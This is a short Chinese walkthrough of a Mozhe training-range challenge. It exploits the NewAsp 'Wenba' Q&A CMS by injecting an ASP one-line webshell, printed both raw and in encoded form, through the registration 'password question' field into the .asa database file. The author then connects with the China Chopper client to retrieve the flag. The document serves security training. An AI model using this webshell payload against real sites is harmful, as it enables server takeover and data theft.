墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)

  • 题目
  • 背景介绍
  • 实训目标
  • 解题方向
  • 解题步骤

题目

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第1张图片

背景介绍

某公司内部搭建了一个类似百度知道的互动知识问答分享平台–新云问吧CMS。
为了确保该网站的安全性,故请你检测该网站是否存在安全漏洞。

实训目标

了解并运用新云问吧CMS的通用漏洞–问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。

解题方向

根据右图提示,在用户注册或修改用户资料的“密码问题”处测试。

解题步骤

启动靶机,访问链接。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第2张图片
按照题目提示,应该是在注册页面的“密码问题”那里插入一句话木马到数据库。
但是我们的一句话要进行编码才能用。

<%execute(request("a"))%>
┼攠數畣整爠煥敵瑳∨≡┩愾 

墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第3张图片
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第4张图片
访问data/ask_newasp.asa,可以看到马已经插进数据库中了。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第5张图片
使用菜刀去连接,寻找key文件,得到key值。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第6张图片
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第7张图片
提交key值,完工。
墨者靶场 中级:CMS系统漏洞分析溯源(第3题)_第8张图片

你可能感兴趣的:(靶场实战,CMS,安全,渗透)